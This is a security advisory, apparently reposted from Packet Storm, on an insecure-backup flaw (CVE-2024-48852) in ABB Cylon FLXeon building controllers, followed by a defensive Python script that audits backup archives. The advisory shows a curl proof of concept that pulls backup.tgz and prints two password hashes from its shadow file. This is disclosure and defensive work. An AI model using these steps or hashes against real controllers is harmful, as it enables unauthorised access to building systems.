ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure

Reported: 14 Feb 2025, by LiquidWorm
Type: packetstorm
Source: packetstorm.news
Views: 247

Insecure backup exposes sensitive data in ABB Cylon FLXeon <=9.3.4, risking unauthorized access.

ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure
    
    
    Vendor: ABB Ltd.
    Product web page: https://www.global.abb                   
    Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                      CBX Series (FLX Series)
                      CBT Series
                      CBV Series
                      Firmware: <=9.3.4
    
    Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
    series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
    building management solutions. ABB BACnet controllers are designed for intelligent
    control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
    heat pump systems, air handling units (constant volume, variable air volume, and
    multi-zone), rooftop units, electrical systems such as lighting control, variable
    frequency drives and metering.
    
    The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
    connectivity and open integration for your building automation systems. It's scalable,
    and modular, allowing you to control a diverse range of HVAC functions.
    
    Desc: A vulnerability exists due to an insecure backup.tgz file that, when obtained,
    contains sensitive system files, including main.db, SSL/TLS certificates and keys,
    the system shadow file with hashed passwords, and the license key. Although authentication
    is required to access the backup, an attacker with access could extract these files
    to retrieve stored credentials, decrypt secure communications, and escalate privileges
    by cracking password hashes. This exposure poses a significant security risk, potentially
    leading to unauthorized access, data breaches, and full system compromise.
    
    MSG: "Backups will perform a full backup to a file that is downloaded to your PC. This
    includes strategy data, BACnet settings, and settings made through this web interface."
    
    Tested on: Linux Kernel 5.4.27
               Linux Kernel 4.15.13
               NodeJS/8.4.0
               Express
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2025-5924
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5924.php
    CVE ID: CVE-2024-48852
    CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852
    
    
    21.04.2024
    
    --
    
    
    $ cat project
    
                     P   R   O   J   E   C   T
    
                            .|
                            | |
                            |'|            ._____
                    ___    |  |            |.   |' .---"|
            _    .-'   '-. |  |     .--'|  ||   | _|    |
         .-'|  _.|  |    ||   '-__  |   |  |    ||      |
         |' | |.    |    ||       | |   |  |    ||      |
     ____|  '-'     '    ""       '-'   '-.'    '`      |____
    ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
             ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
             ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
    
    
    $ curl -k https://7.3.3.1/api/backup \
    > -o backup.tgz \
    > -H "Cookie: user_sid=xxx" \
    > -H "Content-type: application/json"
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 37705  100 37705    0     0  15947      0  0:00:02  0:00:02 --:--:-- 15949
    
    $ tar -tf backup.tgz
    etc/systemd/
    etc/systemd/resolved.conf
    etc/systemd/journald.conf
    etc/systemd/user/
    etc/systemd/timesyncd.conf
    etc/systemd/system/
    etc/systemd/system/dbus-org.freedesktop.resolve1.service
    etc/systemd/system/basic.target.wants/
    etc/systemd/system/nfsserver.service
    etc/systemd/system/psplash.service
    etc/systemd/system/default.target
    etc/systemd/system/dbus-org.freedesktop.network1.service
    etc/systemd/system/nodejs.service
    etc/systemd/system/modutils.service
    etc/systemd/system/supervisord.service
    etc/systemd/system/syslog.service
    etc/systemd/system/systemd-udevd.service
    etc/systemd/system/sysinit.target.wants/
    etc/systemd/system/sysinit.target.wants/run-postinsts.service
    etc/systemd/system/local-fs.target.wants/
    etc/systemd/system/local-fs.target.wants/var-volatile-spool.service
    etc/systemd/system/local-fs.target.wants/var-volatile-cache.service
    etc/systemd/system/local-fs.target.wants/var-volatile-lib.service
    etc/systemd/system/local-fs.target.wants/var-volatile-srv.service
    etc/systemd/system/systemd-random-seed.service.wants/
    etc/systemd/system/systemd-random-seed.service.wants/var-volatile-lib.service
    etc/systemd/system/getty.target.wants/
    etc/systemd/system/getty.target.wants/[email protected]
    etc/systemd/system/telnetd.service
    etc/systemd/system/network-online.target.wants/
    etc/systemd/system/network-online.target.wants/systemd-networkd-wait-online.service
    etc/systemd/system/nfscommon.service
    etc/systemd/system/bluetooth.target.wants/
    etc/systemd/system/bluetooth.target.wants/bluetooth.service
    etc/systemd/system/sync-clocks.service
    etc/systemd/system/stunnel.service
    etc/systemd/system/lighttpd.service
    etc/systemd/system/ntpd.service
    etc/systemd/system/thttpd.service
    etc/systemd/system/sockets.target.wants/
    etc/systemd/system/sockets.target.wants/rpcbind.socket
    etc/systemd/system/sockets.target.wants/dropbear.socket
    etc/systemd/system/sockets.target.wants/systemd-networkd.socket
    etc/systemd/system/dbus-1.service
    etc/systemd/system/systemd-hostnamed.service
    etc/systemd/system/multi-user.target.wants/
    etc/systemd/system/multi-user.target.wants/rngd.service
    etc/systemd/system/multi-user.target.wants/nodejs.service
    etc/systemd/system/multi-user.target.wants/systemd-resolved.service
    etc/systemd/system/multi-user.target.wants/atd.service
    etc/systemd/system/multi-user.target.wants/supervisord.service
    etc/systemd/system/multi-user.target.wants/machines.target
    etc/systemd/system/multi-user.target.wants/media-sda1.mount
    etc/systemd/system/multi-user.target.wants/strongswan.service
    etc/systemd/system/multi-user.target.wants/vsftpd.service
    etc/systemd/system/multi-user.target.wants/crond.service
    etc/systemd/system/multi-user.target.wants/lighttpd.service
    etc/systemd/system/multi-user.target.wants/ntpd.service
    etc/systemd/system/multi-user.target.wants/systemd-networkd.service
    etc/systemd/system/multi-user.target.wants/ntpdate.service
    etc/systemd/system/multi-user.target.wants/remote-fs.target
    etc/systemd/system/multi-user.target.wants/hwclock.timer
    etc/systemd/system/multi-user.target.wants/gplv3-notice.service
    etc/systemd/system/dhcp-server.service
    etc/systemd/system/dbus-org.bluez.service
    etc/systemd/system/timers.target.wants/
    etc/systemd/system/timers.target.wants/logrotate.timer
    etc/systemd/system/networking.service
    etc/systemd/coredump.conf
    etc/systemd/logind.conf
    etc/systemd/network/
    etc/systemd/network/30-wlan.network
    etc/systemd/network/10-eth.network
    etc/systemd/network/60-usb.network
    etc/systemd/user.conf
    etc/systemd/system.conf
    etc/passwd
    etc/group
    etc/shadow
    etc/gshadow
    etc/hostname
    usr/local/aam/etc/com.properties
    usr/local/aam/etc/bdt.txt
    usr/local/aam/etc/bdt2.txt
    usr/local/aam/etc/dynamic.db
    usr/local/aam/etc/main-bkup.db
    usr/local/aam/etc/main.db
    usr/local/aam/etc/priArray.db
    usr/local/aam/etc/license.txt
    etc/localtime
    home/MIX_CMIX/node-server/certs/
    home/MIX_CMIX/node-server/certs/cbxi.cert.pem
    home/MIX_CMIX/node-server/certs/cbxi.key.pem
    home/MIX_CMIX/node-server/certs/intermediate.cert.pem
    home/MIX_CMIX/node-server/certs/kennesaw-ca.crt
    usr/local/aam/fud/
    usr/local/aam/fud/store/
    
    $ tar -xf backup.tgz -C backup_extracted
    $ tail -n 2 backup_extracted/etc/shadow
    admin:$6$CYDLiwrd/dJ6GBxa$FZxr6hz56.FkEDlz2No/lZiEwX/ArpBbf/jIuLOKpPLDRy02ur0pXsVVCYdR8HmKOudNEtlNGpRh4Nkgk.s3S/:17901:0:99999:7:::
    cxpro:$6$tJ.mhJzEwaMWh01A$7ureB0a6.mcxhLGLwyRUeOhykLPf/FOXqWT.729Q/rjIamCGFUsxuptdrvX7GdEAy3ayzhzD8e14M.ftzyXGn0:17901:0:99999:7:::
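The listing above shows why a backup like this needs review before it is stored, shared or attached to a ticket: it carries the shadow file, the node server's private key and the controller databases in one unencrypted archive. The following is an added example, not code from the advisory or from ABB. It builds a small, constructed backup.tgz in memory with the same path layout the advisory lists (all file contents are placeholders, including the shadow hashes), then audits it without extracting anything to disk: every member is classified against a set of sensitive-path patterns, and the shadow file is parsed to report which accounts carry a crackable hash and which hash scheme is exposed. The function names, the category labels in `SENSITIVE_PATTERNS` and the sample file contents are this example's own assumptions.

```python
"""Audit a backup archive for sensitive content before it is stored or shared.
Added example for this advisory; not ABB code and not part of the advisory.
It constructs a backup.tgz in memory with the advisory's path layout
(placeholder contents) and scans it without extracting to disk."""
import io
import re
import tarfile

# Path patterns that should never travel in an unencrypted backup.
# Category names are this example's own, not a vendor classification.
SENSITIVE_PATTERNS = [
    ("shadow_file", re.compile(r"(^|/)g?shadow$")),
    ("private_key", re.compile(r"\.key(\.pem)?$|(^|/)id_(rsa|ecdsa|ed25519)$")),
    ("certificate", re.compile(r"\.(crt|cer|pem)$")),
    ("database", re.compile(r"\.db$")),
    ("license", re.compile(r"(^|/)license\.txt$")),
]

# crypt(3) hash prefixes, so the report can say which hash scheme is exposed.
HASH_ALGORITHMS = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}

def classify_path(path):
    """Return the sensitivity category for an archive member, or None."""
    for category, pattern in SENSITIVE_PATTERNS:
        if pattern.search(path):
            return category
    return None

def parse_shadow(text):
    """Parse shadow(5) lines into (user, status, algorithm) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pw = line.split(":")[:2]
        if pw == "":
            rows.append((user, "empty", None))      # login with no password
        elif pw[0] in "!*":
            rows.append((user, "locked", None))     # no usable hash
        else:
            algo = next((name for prefix, name in HASH_ALGORITHMS.items()
                         if pw.startswith(prefix)), "unknown")
            rows.append((user, "hashed", algo))
    return rows

def audit_backup(archive_bytes):
    """Scan a .tgz in memory; return sensitive members and parsed shadow rows."""
    findings, shadow_rows = [], []
    # Members are read via extractfile() and never written to a path, so a
    # hostile archive with '../' member names cannot escape the working dir.
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            category = classify_path(member.name)
            if category is None:
                continue
            findings.append((member.name, category))
            if member.name.rsplit("/", 1)[-1] == "shadow":
                data = tar.extractfile(member).read().decode("utf-8", "replace")
                shadow_rows.extend(parse_shadow(data))
    return {"findings": findings, "shadow": shadow_rows}

def summarize(report):
    """Count findings per category."""
    counts = {}
    for _, category in report["findings"]:
        counts[category] = counts.get(category, 0) + 1
    return counts

def build_sample_backup():
    """Constructed backup.tgz mirroring the advisory's layout; all contents fake."""
    files = {
        "etc/passwd": b"root:x:0:0::/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n",
        "etc/shadow": (b"root:*:17901:0:99999:7:::\n"
                       b"admin:$6$SALTSALT$PLACEHOLDERHASH:17901:0:99999:7:::\n"
                       b"cxpro:$6$SALTSALT$PLACEHOLDERHASH:17901:0:99999:7:::\n"
                       b"guest::17901:0:99999:7:::\n"),
        "etc/gshadow": b"root:*::\n",
        "etc/hostname": b"flxeon\n",
        "usr/local/aam/etc/main.db": b"SQLite format 3\x00",
        "usr/local/aam/etc/license.txt": b"LICENSE-PLACEHOLDER\n",
        "home/MIX_CMIX/node-server/certs/cbxi.cert.pem": b"-----BEGIN CERTIFICATE-----\nFAKE\n",
        "home/MIX_CMIX/node-server/certs/cbxi.key.pem": b"-----BEGIN PRIVATE KEY-----\nFAKE\n",
        "home/MIX_CMIX/node-server/certs/kennesaw-ca.crt": b"-----BEGIN CERTIFICATE-----\nFAKE\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

if __name__ == "__main__":
    for path, category in audit_backup(build_sample_backup())["findings"]:
        print(f"{category:12s} {path}")
```

Running the script lists seven flagged members (two shadow files, one private key, two certificates, one database, the licence file) and, for the shadow file, reports `root` as locked, `guest` as having an empty password field, and `admin` and `cxpro` as carrying sha512crypt hashes. The same `audit_backup` call works on a real archive read from disk; the point of keeping the scan in memory is that an archive pulled from an untrusted controller is never extracted to a path it could influence.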


Vulners AI Score: 7 (High risk)
CVSS 3.1: 9.4
CVSS 4: 6.9
EPSS: 0.02585